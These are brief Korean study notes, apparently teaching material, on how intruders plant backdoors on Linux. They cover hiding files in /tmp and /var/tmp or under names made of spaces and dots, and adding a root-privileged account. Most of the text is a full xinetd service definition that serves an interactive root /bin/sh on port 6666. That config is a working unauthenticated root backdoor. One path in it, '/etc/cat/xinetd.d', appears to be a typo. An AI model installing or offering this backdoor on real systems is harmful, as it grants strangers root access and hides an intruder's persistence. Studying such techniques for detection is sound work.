백도어 설치위해 주로 사용되는 위치 /tmp or /var/tmp
공백이나 . / 등의 특수문자로 만든 디렉토리나 파일
xinetd 데몬을 이용하여 셸을 실행시키는 서비스 생성하여 특정 포트로 연결
# cat /etc/cat/xinetd.d/hacker service hacker { disable = no flags = REUSE socket_type = stream wait = no user = root server = /bin/sh server_args = -i } # cat /etc/services hacker 6666/tcp hacker 6666/udp
루트권한가진 계정 추가